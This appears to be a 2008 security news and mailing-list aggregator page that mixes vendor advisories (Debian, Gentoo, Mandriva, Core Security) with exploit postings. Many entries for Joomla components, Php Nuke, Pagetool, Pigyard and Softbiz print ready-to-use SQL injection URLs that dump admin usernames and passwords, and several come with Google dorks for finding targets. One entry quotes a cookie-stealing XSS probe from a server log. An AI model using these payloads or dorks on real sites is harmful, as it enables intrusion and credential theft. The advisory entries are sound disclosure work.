Microsoft's glasnost on interoperability means more bugs, more exploits

 ( 634 days 13 hours ago)

Microsoft's decision to offer more information about its software code to bolster interoperability could mean more exploits in the short term, security experts said. But it could also mean more-secure software down the road.

NULL pointer in SurgeFTP 2.3a2

 ( 634 days 13 hours ago)

Luigi Auriemma Application: SurgeFTP Versions: <= 2.3a2 Platforms: Windows, Linux and Solaris Bug: NULL pointer access Exploitation: remote Date: 25 Feb 2008 Author: Luigi Auriemma e-mail: aluigiatautistici.org web: aluigi.org 1) Introduction 2) Bug 3) The Code 4) Fix 1) Introduction ...

Re: Powered by Pagetool Ver (1.04-05-06-07)

 ( 634 days 13 hours ago)

Discovered in June '07: On Sun, Feb 24, 2008 at 10:00:41AM -0000, turkish-warrorrathotmail.com wrote: > Google arama : > www.1923turk.org > > Turkishwariorr > > Powered by Pagetool Ver 1.04 > Powered by Pagetool Ver 1.07 > Powered by Pagetool Ver 1.05 > Powered by Pagetool Ver 1.06 > ...

Format string and buffer-overflow in SurgeMail 38k4

 ( 634 days 13 hours ago)

Luigi Auriemma Application: SurgeMail Mail Server Netwin's WebMail Versions: SurgeMail <= 38k4 and beta 39a Netwin's WebMail <= 3.1s (only bug A) Platforms: Windows, Linux, FreeBSD, MacOSX and Solaris Bugs: A] format string in webmail.exe's page command B] buffer-overflow in the building of environment strings ...

[SECURITY] [DSA 1508-1] New diatheke packages fix arbirary shell command execution

 ( 634 days 13 hours ago)

- Debian Security Advisory DSA-1508-1 securityatdebian.org Thijs Kinkhorst February 25, 2008 - Package : diatheke Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE Id : CVE-2008-0932 Debian Bug : 466449 Dan Dennison discovered that Diatheke, a CGI program to make a bible ...

Powered by Pagetool Ver (1.04-05-06-07)

 ( 634 days 13 hours ago)

Google arama : www.1923turk.org Turkishwariorr Powered by Pagetool Ver 1.04 Powered by Pagetool Ver 1.07 Powered by Pagetool Ver 1.05 Powered by Pagetool Ver 1.06 Site sonuna : index.php?name=pagetoolnews&newsid=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/ptcoreusers/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*

Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

 ( 634 days 13 hours ago)

Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN 1) Remote File Inclusion File: /modules/syntaxhighlight.php Register Globals: ON Vuln code:

Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection

 ( 634 days 13 hours ago)

Aria-Security Team (Persian Security Network) Shoutz: Aura, imm02tal, Kinglet, iM4n Joomla Compublication "pid" Remote SQL Injection index.php?option=compublication&task=view&pid=-9999999union/**/select0,username,password,0,0,0,0/**/from/**/josusers/* note: the prefix (jos) maybe different for each website... Regards, The-0utl4w Credits Goes to Aria-Security Team

CORE-2007-0930 Path Traversal vulnerability in VMware's shared folders implementation

 ( 634 days 13 hours ago)

Core Security Technologies - CoreLabs Advisory Path Traversal vulnerability in VMware's shared folders implementation *Advisory Information* Title: Path Traversal vulnerability in VMware's shared folders implementation Advisory ID: CORE-2007-0930 Advisory URL: Date published: 2008-02-25 Date of last update: 2008-02-25 Vendors contacted: VMware Inc. Release mode: User release ...

[ GLSA 200802-10 ] Python: PCRE Integer overflow

 ( 634 days 13 hours ago)

- - Gentoo Linux Security Advisory GLSA 200802-10 - - - - Severity: Normal Title: Python: PCRE Integer overflow Date: February 23, 2008 Bugs: #198373 ID: 200802-10 - - Synopsis A vulnerability within Python's copy of PCRE might lead to the ...

Packeteer Products File Listing XSS

 ( 634 days 13 hours ago)

Packeteer Products File Listing XSS Product: Packeteer PacketShaper Packeteer PolicyCenter ...

Php Nuke "Sell" module SQL Injection ("cid")

 ( 634 days 13 hours ago)

Aria-Security Team (Persian Security Network) Shoutz: Aura, imm02tal, Kinglet, iM4n Php Nuke "Sell" module SQL Injection ("cid") modules.php?name=Sell&dop=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/fromnukeauthors/*where admin 1 0 2 Original Adivosry: Regards, The-0utl4w Credits Goes to Aria-Security Team

[SECURITY] [DSA 1506-1] New iceape packages fix several vulnerabilities

 ( 634 days 13 hours ago)

- Debian Security Advisory DSA-1506-1 securityatdebian.org Moritz Muehlenhoff February 24, 2008 - Package : iceape Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2008-0412 CVE-2008-0413 CVE-2008-0414 CVE-2008-0415 CVE-2008-0417 CVE-2008-0418 CVE-2008-0419 CVE-2008-0591 CVE-2008-0592 CVE-2008-0593 CVE-2008-0594 ...

S21SEC-040-en: Infinite invalid authentication attempts possible in BEA WebLogic Server

 ( 634 days 19 hours ago)

- S21Sec Advisory - Title: Infinite invalid authentication attempts possible in BEA WebLogic Server ID: S21SEC-040-en Severity: Medium Scope: BEA Weblogic Platforms: All Author: rpinuagaats21sec.com URL: Release: Public [ SUMMARY ] ...

Alkacon OpenCms tree_files.jsp resource XSS

 ( 634 days 19 hours ago)

Alkacon OpenCms treefiles.jsp resource XSS Product: Alkacon OpenCms OpenCms contains a cross-site scripting vulnerability in the file tree navigation function. An invalid value supplied to parameter resource in page opencms/system/workplace/views/explorer/treefiles.jsp is not sanitized before it gets embedded in the HTML output as part of a JavaScript comment. ...

[SECURITY] [DSA 1507-1] New turba2 packages fix permission testing

 ( 634 days 19 hours ago)

- Debian Security Advisory DSA-1507-1 securityatdebian.org Steve Kemp February 24, 2008 - Package : turba2 Vulnerability : programming error Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0807 Debian Bug : 464058 Peter Paul Elfferich discovered that turba2, a contact management component ...

Pigyard Art Gallery Multiple SQL Injection

 ( 634 days 19 hours ago)

Aria-Security Team, Shout Outs: AurA, imm02tal, iM4N, Kinglet, Vendor: Pigyard Art Gallery Multiple SQL Injection This is a completation of the original advisory reported by ZoRLu @ Milw0rm () Original Link: module.php?module=gallery&modPage=showpicturefull&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* module.php?module=gallery&modPage=showpicturefull&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=showpicturefull&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* Regards, The-0utl4w Credits Goes To Aria-Security.Net

Softbiz jokes and funny pictures (index.php) sql injection

 ( 634 days 19 hours ago)

Script:Softbiz jokes & funny pictures Author:-=Mizo=- Dork:inurl:/index.php?sbcatid= Exploit:/index.php?sbcatid=-1 union select 0,1,2,concat(sbadminname,0x3a,sbadminpwd),4,5,6,7,8,9 from sbjksadmin/* Admin cpanel:/path/admin Greetz: L!0n - Redcasper - SoSo H H - DC - Iraqistrike - Crackman - B0rizQ - Mahmoodali - Net^Virus - iraqistrike and all my friends!!

Joomla com_inter "id" Remote SQL Injection

 ( 634 days 19 hours ago)

Aria-Security Team (Persian Security Network) Shoutz : AurA, Sc0rp!on, mormoroth, Kinglet, iM4N, Joomla cominter "id" Remote SQL Injection index.php?option=cominter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/josuser (Original Advisory@ ) The-0utl4w Aria-Security Team (Credits to Aria-Security Team)

Joomla Com_blog "pid" Remote SQL Injection

 ( 634 days 19 hours ago)

Aria-Security Team (Persian Security Network) Shoutz : The-0utl4w, Sc0rp!on, T3rr0r1st, mormoroth, Kinglet Joomla Comblog "pid" Remote SQL Injection index.php?option=comblog&name=aria-Security.Net&task=view&pid=SQL INJECTION (More info and guide on how to use this bug @ ) AurA, Aria-Security Team (Credits to Aria-Security Team)

joomla com_simpleshop SQL Injection(section) #

 ( 634 days 19 hours ago)

# # joomla comsimpleshop SQL Injection(section) # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl:"comsimpleshop" # # DORK 2 : allinurl: "comsimpleshop"section # EXPLOIT : index.php?option=comsimpleshop&Itemid=SatBUN&cmd=section§ion=-000/**/unionselect/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/josusers/* # SatBUN i AM NOT HACKER SatBUN

Re: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)

 ( 634 days 19 hours ago)

Hi list, I am seeing scans for this in the "wild" now... As Dominique said, I don't know who would open up their SIM to the world, but better apply the patch soon. 222.239.78.91 [22/Feb/2008:17:24:48 -0300] "GET /wiki//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolutepath=? HTTP/1.1" 200 6792 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" ...

joomla com_wines SQL Injection(id)

 ( 634 days 19 hours ago)

# # joomla comwines SQL Injection(id) # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl:"comwines" # # DORK 2 : allinurl: comwines "detail" # EXPLOIT : index.php?option=comwines&Itemid=SatBUN&func=detail&id=-000/**/unionselect/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,usernamefrom%2F%2A%2A%2Fmosusers/* # SatBUN i AM NOT HACKER SatBUN

joomla com_garyscookbook SQL Injection(id)

 ( 634 days 19 hours ago)

# # joomla comgaryscookbook SQL Injection(id) # # # AUTHOR : SatBUN # # HOME : # # MAİL : hackturkiye.hackturkiyeatgmail.com # # # DORK 1 : allinurl:"comgaryscookbook" # # DORK 2 : allinurl: comgaryscookbook "detail" # EXPLOIT : index.php?option=comgaryscookbook&Itemid=SatBUN&func=detail&id=-666/**/unionselect/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,usernamefrom%2F%2A%2A%2Fmosusers/* # SatBUN i AM NOT HACKER SatBUN

Joomla com_stat "id" Remote SQL Injection

 ( 634 days 19 hours ago)

Aria-Security Team (Persian Security Network) Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N, Joomla comstat "id" Remote SQL Injection index.php?option=comstats&opt=viewteam&id=-100101110000/**/union/**/select/**/username,password,3,4,5,6,7,8/**/from/**/josusers/* (Original Advisory@ ) AurA Aria-Security Team (Credits to Aria-Security Team)

[ MDVSA-2008:049 ] - Updated nss_ldap package fixes race condition allowing user data theft

 ( 634 days 19 hours ago)

Mandriva Linux Security Advisory MDVSA-2008:049 Package : nssldap Date : February 25, 2008 Affected: 2007.0, Corporate 4.0 Problem Description: A race condition in nssldap, when used in applications that use pthread and fork after a call to nssldap, does not properly handle the ...

Mandriva: Updated nss_ldap package fixes race condition

 ( 634 days 23 hours ago)

LinuxSecurity.com: A race condition in nss_ldap, when used in applications that use pthread and fork after a call to nss_ldap, does not properly handle the LDAP connection, which might cause nss_ldap to return the wrong user data to the wrong process, giving one user access to data belonging to another user, in some cases. The updated package hais been patched to prevent this issue.

Debian: New turba2 packages fix permission testing

 ( 634 days 23 hours ago)

LinuxSecurity.com: Peter Paul Elfferich discovered that turba2, a contact management component for horde framework did not correctly check access rights before allowing users to edit addresses. This could result in valid users being able to alter private address records.

Debian: New iceape packages fix several vulnerabilities

 ( 634 days 23 hours ago)

LinuxSecurity.com: Several remote vulnerabilities have been discovered in the Iceape internet suite, an unbranded version of the Seamonkey Internet Suite. The Common Vulnerabilities and Exposures project identifies the following problems: Jesse Ruderman, Kai Engert, Martijn Wargers, Mats Palmgren and Paul Nickerson discovered crashes in the layout engine, which might allow the execution of arbitrary code.

Gentoo: Python PCRE Integer overflow

 ( 634 days 23 hours ago)

LinuxSecurity.com: A vulnerability within Python's copy of PCRE might lead to the execution of arbitrary code.

Mandriva: Updated Firefox packages fix multiple

 ( 634 days 23 hours ago)

LinuxSecurity.com: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 2.0.0.12. This update provides the latest Firefox to correct these issues.

Debian: New alsa-driver packages fix kernel memory leak

 ( 634 days 23 hours ago)

LinuxSecurity.com: Takashi Iwai supplied a fix for a memory leak in the snd_page_alloc module. Local users could exploit this issue to obtain sensitive information from the kernel (CVE-2007-4571).